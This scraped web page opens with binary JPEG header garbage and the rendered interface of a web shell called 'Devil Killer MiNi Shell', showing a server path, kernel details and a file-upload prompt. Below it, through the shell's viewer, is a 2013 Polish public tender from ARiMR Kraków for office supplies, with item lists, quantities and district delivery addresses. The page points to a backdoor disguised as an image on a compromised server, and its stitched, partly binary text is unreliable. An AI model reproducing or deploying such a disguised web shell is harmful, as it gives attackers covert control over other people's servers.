JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130712/274034-N-2013.html

<p class="kh_header"><b>Kraków: Dostawa materiałów biurowych i papieru dla Małopolskiego Oddziału Regionalnego ARiMR</b><br>
<b>Numer ogłoszenia: 274034 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Lubicz 25, 31-503 Kraków, woj. małopolskie, tel. 012 6298010, faks 012 4211311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja wykonawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i papieru dla Małopolskiego Oddziału Regionalnego ARiMR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa do siedziby Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim materiałów biurowych oraz papieru  w poniżej przedstawionych ilościach i asortymencie:



Lp.
Nazwa przedmiotu
Opis
J.m.
Ilość
1
papier format A4
do dokumentów tworzonych do wewnętrznego użytku firmy, oraz do czarno-białych dokumentów tekstowych, zalecany do drukarek laserowych i kopiarek, możliwość jedno i dwustronnego kopiowania, gramatura 80g/m2, białość CIE 146( + -3)-opakowanie ryza zawiera 500 arkuszy, pudełko zawiera 5 ryz.
ryza
8 000
2
papier format A3
do dokumentów tworzonych do wewnętrznego użytku firmy, oraz do czarno-białych dokumentów tekstowych, zalecany do drukarek laserowych i kopiarek, możliwość jedno i dwustronnego kopiowania, gramatura 80g/m2, białość CIE 146( + -3)-opakowanie -ryza zawiera 500 arkuszy, pudełko zawiera 5 ryz.
ryza
50
3
papier ksero kolor mat A4
Specjalny papier powlekany matowy (SILK) do kolorowych laserowych urządzeń kopiujących oraz kolorowych drukarek laserowych. Bezdrzewny, biały, gramatura 170 g/m2, ryza 250 ark.
ryza
5
4
papier ksero kolor błysk A4
Specjalny papier powlekany błyszczący (GLOSS) do kolorowych laserowych urządzeń kopiujących oraz kolorowych drukarek laserowych. Bezdrzewny, biały, gramatura 170 g/m2, ryza 250 ark.
ryza

5
Blok biurowy-listowy A5
Pojemność minimum 80 kart w kratę, z dobrego gatunku papieru, z okładką sztywną, kartonową jako podkładką
Szt.
200
6
Blok biurowy-listowy A4
Pojemność minimum 80 kart w kratę, z dobrego gatunku papieru, z okładką sztywną, kartonową jako podkładką
Szt.
100
7
Brulion - kołonotatnik A5
Pojemność minimum 60 kart w kratę, z dobrego gatunku papieru, z twardą okładką, sklejony w górnej części, perforowany (dziurki umożliwiające wpięcie do segregatora)
Szt.
200
8
Brulion-zeszyt A5
o pojemności minimum 95 kart, w kratę, z wysokiej jakości papieru, w twardej okładce
Szt.
50
9
Datowniki samotuszujące
Gwarancja dużej wytrzymałości przeznaczony do bardzo intensywnego użytkowania w wersji rok-miesiąc-dzień (od 2011), o wymiarach nie większych niż 45x25x90mm, wysokość czcionki 3-4 mm
Szt.
100
10
Długopis jednorazowy czarny
Długopis jednorazowy z tuszem w kolorze czarnym
Szt.
350
11
Długopis jednorazowy niebieski
Długopis jednorazowy z tuszem w kolorze niebieskim
Szt.
3 500
12
Długopis jednorazowy czerwony
Długopis jednorazowy z tuszem w kolorze czerwonym
Szt.
350
13
Długopis żelowy niebieski
Z przezroczystą obudową pozwalającą kontrolować poziom tuszu, grubość linii 0,5-0,6 mm, długość linii pisania minimum 800 m
Szt.
1 500
14
Długopis niebieski automat 
Trwały długopis z automatyczny z wymiennymi wkładami wielkopojemnymi, szerokość linii pisania 0,6-07 mm, długość linii pisania minimum 3500 m, kolor tuszu niebieski
Szt.
1 000
15
Długopis niebieski na sprężynce
Długopis na sprężynce i przyklejaną podstawą, jednorazowy
Szt.
1 000
16
Druk KP (Kasa przyjmie)
Papier samokopiujący, format A6, blok minimum 80 kartek
Szt.
100
17
Grzbiet do bindowania 8 mm
Przeznaczone do oprawy dokumentów, 8 mm
Szt.
150
18
Grzbiety nasuwane plastikowe 3 mm
Przeznaczone do oprawy dokumentów, 3 mm
Szt.
300
19
Grzbiety nasuwane plastikowe 4 mm
Przeznaczone do oprawy dokumentów, 4 mm
Szt.
300
20
Grzbiety nasuwane plastikowe 6 mm
Przeznaczone do oprawy dokumentów, 6 mm
Szt.
300
21
Grzbiety nasuwane plastikowe 9-12 mm
Przeznaczone do oprawy dokumentów, 9-12 mm
Szt.
400
22
Gumki recepturki
O różnych kolorach i średnicach, pakowane w woreczki lub pojemniczki po min. 40g wagi netto, elastyczne, nie zleżałe   
Op.
100
23
Kalkulator biurowy zwykły
wyświetlacz 12 pozycji, podwójne zasilanie, trwała plastikowa obudowa
Szt.
100
24
Klej biurowy w sztyfcie
W sztyfcie minimum 35 g, bezbarwny, bezwonny, nietoksyczny, zmywalny, przeznaczony do papieru, kartonu, przydatny do stosowania w okresie co najmniej 2 lat
Szt.
2 000
25
Klipy biurowe 15 mm 
Wykonane ze stali o dużej sprężystości i trwałości. Galwanizowane, opakowanie minimum 12 szt.
Op.
200
26
Klipy biurowe 32 mm 
Wykonane ze stali o dużej sprężystości i trwałości. Galwanizowane, opakowanie minimum 12 szt.
Op.
200
27
Klipy biurowe 41 mm 
Wykonane ze stali o dużej sprężystości i trwałości. Galwanizowane, opakowanie minimum 12 szt.
Op.
200
28
Klipy biurowe 51 mm 
Wykonane ze stali o dużej sprężystości i trwałości. Galwanizowane, opakowanie minimum 12 szt.
Op.
200
29
Koperta z folią bąbelkową 270/360 mm
Koperta do bezpiecznego przesyłania dokumentów
Szt.
100
30
Linijka 30 cm
Wykonana z przezroczystego tworzywa
Szt.
50
31
Linijka 40 cm
Wykonana z przezroczystego tworzywa
Szt.
50
32
Marker permanentny czarny (cienki) 1mm
Czarny, uniwersalny, do opisywania płyt CD/DVD, folii, szkła, metalu, itp., szybkoschnący, nietoksyczny, grubość linii pisania do 1 mm, pozostawiony nie zamknięty, nie wysycha, gwarancja nie wysychania przy przechowywaniu - minimum 2 lata
Szt.
100
33
Marker permanentny, olejowy, czarny 4 mm
Trwały, wodoodporny, z możliwością pisania na kartonie, tworzywie sztucznym, metalu, szybkie wysychanie po naniesieniu tekstu, grubość linii pisania minimum 4 mm
Szt.
50
34
Notes samoprzylepny 12x51 mm
Karteczki z samoprzylepnym paskiem, w kolorze żółtym, do wielokrotnego przyklejania i odklejania, bloczek zawiera co najmniej 100 kartek
Bl.
300
35
Notes samoprzylepny 38x51 mm
Karteczki z samoprzylepnym paskiem, w kolorze żółtym, do wielokrotnego przyklejania i odklejania, bloczek zawiera co najmniej 100 kartek
Bl.
2000
36
Notes samoprzylepny 76x51 mm
Karteczki z samoprzylepnym paskiem, w kolorze żółtym, do wielokrotnego przyklejania i odklejania, bloczek zawiera co najmniej 100 kartek
Bl.
1000
37
Notes samoprzylepny 76x127 mm
Karteczki z samoprzylepnym paskiem, w kolorze żółtym, do wielokrotnego przyklejania i odklejania, bloczek zawiera co najmniej 100 kartek
Bl.
500
38
Nożyczki biurowe
Wysoka jakość, ostrze wykonane ze stali narzędziowej, rączka trwała, w przypadku wykonania z tworzywa sztucznego - odporna na pęknięcia, minimalna długość 21 cm
Szt.
200
39
Ołówek zwykły HB
Ołówek zwykły z gumką, twardość HB
Szt.
1000
40
Pinezki do tablic korkowych
Kolorowe, typu kołeczki, do tablic korkowych, opakowanie minimum 30 sztuk
Op.
50
41
Pojemnik plastikowy- stojący na dokumenty A4
Stojący, wykonany z plastiku, na dokumenty A4 (stojąco), 
Szt.
100
42
Pojemnik plastikowy- kuweta na dokumenty A4
Wykonany z plastiku, przeźroczysty, wymiary orientacyjne 75x311x264 mm na dokumenty A4 (leżąco)
Szt.
100
43
Przekładki do segregatora A4
Przekładki kolorowe do segregatora A4 min. 10 kart
Szt.
500
44
Przybornik na biurko
Pojemnik na podręczną galanterię biurową pozwalającą na organizację pracy na biurku
Szt.
50
45
Pudła archiwizacyjne A4
Wykonane z twardej tektury falistej, po złożeniu stabilne i trwałe, dostosowane do przechowywania dokumentów formatu A4 spiętych w teczki archiwizacyjne, posiadające otwór na palec ułatwiający wkładanie i wyjmowanie pojemnika z półki, miejsce do opisu zawartości pojemnika na grzbiecie, dłuższa zakładka na grzbiecie uniemożliwiająca samodzielne otwieranie (wymiary zewnętrzne po złożeniu: głębokość 250 mm, szerokość 80 mm, wysokość 350 mm)
Szt.
10 000
46
Pudła archiwizacyjne duże A4 bezkwasowe
Wykonane z twardej tektury falistej, po złożeniu stabilne i trwałe, dostosowane do przechowywania dokumentów formatu A4 spiętych w teczki archiwizacyjne, posiadające otwór na palec ułatwiający wkładanie i wyjmowanie pojemnika z półki, miejsce do opisu zawartości pojemnika na grzbiecie, dłuższa zakładka na grzbiecie uniemożliwiająca samodzielne otwieranie (wymiary zewnętrzne po złożeniu: długość 270, szerokość 80, wysokość 340 mm)
Szt.
100
47
Pudła archiwizacyjne IRZ z pokrywą
Wykonane z twardej tektury falistej, otwierane z góry, z przykrywką, na dokumenty formatu A4 i A5, wymiary zewnętrzne po złożeniu: głębokość 350 mm, szerokość 250 mm, wysokość 180 mm), pokrywa dostosowana do wymiarów pudła.
Szt.
2 000
48
Segregator A4/45 kolor
Do codziennego użytku w biurze, wykonany z twardej tektury pokrytej folią, z mechanizmem dźwigniowym, kolory dowolne, na grzbiecie miejsce na wsuwaną etykietę i otwór na palec do wysuwania z półki
Szt.
500
49
Segregator A4/75 kolor
Do codziennego użytku w biurze, wykonany z twardej tektury pokrytej folią, z mechanizmem dźwigniowym, kolory dowolne, na grzbiecie miejsce na wsuwaną etykietę i otwór na palec do wysuwania z półki
Szt.
4 500
50
Segregator A4/75 marmurek
wykonany z twardej tektury, z oklejką wykonaną z papieru o wzorze marmurkowym, brzegi wzmocnione metalowymi okuciami, z mechanizmem dźwigniowym, na przedniej okładce dwa otwory ułatwiające zamykanie, otwór na palec na grzbiecie
Szt.
2 000
51
Spinacz archiwizacyjny
Wykonany z polietylenu wzmocniony metalem pozwalającym wielokrotne zginanie, min. 100 szt. w opakowaniu
Op.
100
52
Taśma biurowa klejąca wąska 19x33 
Przeźroczysta na rolce, samoprzylepna z możliwością pisania po niej, nie żółknąca z upływem czasu, średnica wewnętrzna taśmy 26 mm
Szt.
500
53
Taśma szeroka klejąca 48/50
Wykonana na kleju z kauczuku syntetycznego, w kolorze brązowym, przeznaczona do zaklejania kartonów, średnica wewnętrzna taśmy 75 mm
Szt.
400
54
Teczka z gumką 15mm
Wykonana z grubego kartonu (min 350g/m2)
Szt.
50
55
Teczka z gumką 40mm
Wykonana z grubego kartonu (min 350g/m2)
Szt.
100
56
Teczka wiązana biała A4
Wykonana z grubego kartonu (min 350g/m2) do przechowywania dokumentów w składnicy akt, wyposażona w tasiemki, wewnątrz wyposażona w klapki zabezpieczające przed wypadaniem dokumentów, pojemność minimum 5 cm bieżących dokumentów.
Szt.
20 000
57
Teczka wiązana biała A4 poszerzana
Wykonana z grubego kartonu (min 350g/m2) do przechowywania dokumentów w składnicy akt, wyposażona w tasiemki, wewnątrz wyposażona w klapki zabezpieczające przed wypadaniem dokumentów, pojemność minimum 8 cm bieżących dokumentów.
Szt.
1 000
58
Tusz do stempli czarny
Uniwersalny tusz wodny do papieru i dokumentów, przeznaczony do stempli i automatów samotuszujących, do stempli z gumową lub polimerową płytką stemplującą, pojemność buteleczki minimum 25 ml
Szt.
200
59
Tusz do stempli zielony
Uniwersalny tusz wodny do papieru i dokumentów, przeznaczony do stempli i automatów samotuszujących, do stempli z gumową lub polimerową płytką stemplującą, pojemność buteleczki minimum 25 ml
Szt.
300
60
Wkład do kubika 85x85mm
Karteczki białe lub kolorowe, klejone wzdłuż jednego boku, jedna sztuka wkładu minimum 300 kartek 
Szt.
200
61
Zakreślacz fluorescencyjny tekstu komplet 4 kolory, 
4 kolor w komplecie, przeznaczony do wszystkich rodzajów papieru, odporny na wysychanie, płaski kształt i wygodny klips, szeroka końcówka minimum 3 mm, obudowa i klips w kolorze tuszu
Szt.
250
62
Zakreślacz fluorescencyjny tekstu, 
Kolor żółty, przeznaczony do wszystkich rodzajów papieru, odporny na wysychanie, płaski kształt i wygodny klips, szeroka końcówka minimum 3 mm, obudowa i klips w kolorze tuszu
Szt.
200
63
Zszywacz biurowy, duży
Obudowa wykonana z metalu obudowanego trwałym plastikiem, usztywnione prowadzenie zszywek, możliwość obrotu końcówki zszywającej, na zszywki  23/6, 23/8, 23/10, 23/13, 23/17 i 23/23, możliwość zszywania do 100 kartek jednorazowo, głębokość wsuwania kartki minimum 55 mm, 5 lat gwarancji
Szt.
20
64
Zszywacz biurowy, średni
Obudowa wykonana z metalu obudowanego trwałym plastikiem, usztywnione prowadzenie zszywek, możliwość obrotu końcówki zszywającej, na zszywki 24/6 i 26/6, możliwość zszywania do 25 kartek jednorazowo, głębokość wsuwania kartki minimum 55 mm, 5 lat gwarancji
Szt.
150
65
Temperówka 
Temperówka  z zastosowaniem do ołówków i kredek o średnicy 8mm, z pojemnikiem na odpadki
Szt.
100
66
Kalka ołówkowa
Kalka ołówkowa powlekana fioletową masą piszącą. Do sporządzania odbitek ręcznych. Konfekcjonowana w opk. po minimum 100 ark.
Opak.
40
67
Etykiety samoprzylepne 105x74 8szt./A4 opak. 100 ark.
Uniwersalne etykiety samoprzylepne białe, w arkuszach formatu A4, do stosowania w drukarkach atramentowych, laserowych i kserokopiarkach. Opakowanie zawiera minimum 100 arkuszy w formacie A4.
Opak.
15
68
Kalendarz książkowy na rok 2014
Kalendarz książkowy format A5, zszywany, sztywna oprawa,
Szt.
100
69
Kalendarz trójdzielny na rok 2014
Kalendarz ścienny ze zrywanymi kartami; - kalendarium: układ trójstopniowy (trzy oddzielne kalendaria); miesiąc bieżący wyróżniony kolorystycznie; pod kalendariami materiał usztywniający; pasek regulowany z okienkiem w kolorze czerwonym; główka z motywem pejzaże, zwierzęta, architektura, sztuka, rośliny, pojazdy; dopuszcza się reklamę wykonawcy
Szt.
500


Użyty w opisie przedmiotu zamówienia termin opakowanie oraz podana liczba sztuk, które opakowanie to obejmuje służy jedynie prawidłowemu wyliczeniu ceny. Przy dostawie Zamawiający nie wymaga, aby liczba sztuk w opakowaniu odpowiadała dokładnie liczbie określonej w opisie przedmiotu zamówienia, a jedynie by liczba sztuk odpowiadała ich sumie całkowitej wynikającej z opisu przedmiotu zamówienia.

Wykonawca jest zobowiązany do stosowania nazewnictwa lub nr pozycji asortymentu z w/w opisu przedmiotu zamówienia przy wystawianiu faktur. 

Zamawiający wymaga, aby dostawa asortymentu określonego w przedmiocie zamówienia dokonywana była w sposób umożliwiający natychmiastowe sprawdzenie stanu ilościowego i jakościowego, w szczególności poprzez zapewnienie właściwego opakowania.



W przypadku papieru A4 , papieru A3 oraz materiałów biurowych z pozycji: 45 Pudła archiwizacyjne A4, 47 Pudła archiwizacyjne IRZ z pokrywą, 48 Segregator A4/45 kolor, 49 Segregator A4/75 kolor, 50 Segregator A4/75 marmurek, Wykonawca będzie obowiązany do dostarczenie tychże materiałów (w ramach jednorazowej dostawy) bezpośrednio do siedzib Biur Powiatowych, w przypadku pozostałych pozycji: do siedziby Małopolskiego Oddziału Regionalnego ARiMR 

Poz.	1	2	45	47	48	49	50
Opis.	Papier A4	Papier A3	Pudła archiwizacyjne A4	Pudła archiwizacyjne IRZ z pokrywą	Segregator A4/45 kolor	Segregator A4/75 kolor	Segregator A4/75 marmurek
Jednostka miary	ryza	ryza	Szt.	Szt.	Szt.	Szt.	Szt.
Lp.	Powiat							
1	Bocheński	500	5	0	0	0	0	250
2	Brzeski	120	1	0	0	0	0	0
3	Chrzanowski	1013	30	6200	0	400	3500	0
4	Dąbrowski	75	0	150	0	0	0	150
5	Gorlicki	310	0	1000	30	0	0	100
6	Krakowski	800	0	0	200	0	0	450
7	Limanowski	1000	0	1000	200	0	0	350
8	Miechowski	330	1	0	40	0	0	400
9	Myślenicki	300	0	80	140	0	0	0
10	Nowosądecki	1100	5	500	60	0	0	300
11	Nowotarski	227	0	100	500	0	0	0
12	Olkuski	200	0	100	25	0	0	0
13	Oświęcimski	75	0	120	0	0	0	0
14	Proszowicki	270	4	500	50	0	0	0
15	Suski	500	1	0	0	0	0	0
16	Tarnowski	0	0	0	400	0	0	0
17	Tatrzański	140	0	0	150	0	0	0
18	Wadowicki	1000	1	0	20	0	0	0
19	Wielicki	40	2	250	 0	0	0	0
20	Oddział Regionalny w Krakowie	0	0	0	185	100	1000	0
SUMA	8000	50	10000	2000	500	4500	2000

















Lp.	
Powiat
	
Adres placówki
1	Bocheński	32-700 Bochnia, ul. Windakiewicza 9/1
2	Brzeski	32-800 Brzesko, ul. Szczepanowska 23
3	Chrzanowski	32-500 Chrzanów, ul. Fabryczna 16
4	Dąbrowski	32-200 Dąbrowa Tarnowska, ul. Piłsudskiego 33
5	Gorlicki	38-300 Gorlice, ul. Węgierska 48
6	Krakowski	31-503 Kraków, ul. Lubicz 25
7	Limanowski	34-600 Limanowa, ul. Piłsudskiego 6
8	Miechowski	32-200 Miechów, ul. Konopnickiej 23 a
9	Myślenicki	32-400 Dobczyce, ul. Kościuszki 12
10	Nowosądecki	33-335 Nawojowa 1
11	Nowotarski	34-470 Czarny Dunajec, ul. Kamieniec Dolny 54
12	Olkuski	32-300 Olkusz, ul. Bylicy 1
13	Oświęcimski	32-602 Oświęcim, ul. Wyspiańskiego 10
14	Proszowicki	32-100 Proszowice, ul. Szpitalna 3
15	Suski	34-200 Sucha Beskidzka, ul. Kościelna 5b
16	Tarnowski	33-100 Tarnów, ul. Lwowska 72-96C
17	Tatrzański	34-500 Zakopane, ul. Do Samków 29
18	Wadowicki	34-100 Wadowice, ul. Mickiewicza 36
19	Wielicki	32-005 Niepołomice, ul. 3 Maja 2
20	Oddział Regionalny w Krakowie	31-503 Kraków, ul. Lubicz 25

Zamawiający nie dopuszcza składania ofert wariantowych ani ofert częściowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.22.21-5, 30.19.73.00-9, 30.19.21.00-2, 30.14.12.00-1, 24.91.00.00-6, 30.23.74.30-2, 30.19.21.30-1, 30.23.43.00-1, 30.19.95.00-3, 30.19.72.00-8, 30.19.21.33-2, 39.29.25.00-0, 22.60.00.00-6, 30.12.44.00-8, 30.19.71.30-6, 30.19.28.00-9, 44.61.71.00-9, 30.19.92.30-1, 22.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
- działania siły wyższej lub wystąpienia stanu wyższej konieczności
- wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach
- zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe
- zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
- omyłek pisarskich lub błędów rachunkowych,
-  mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-  jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
- innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
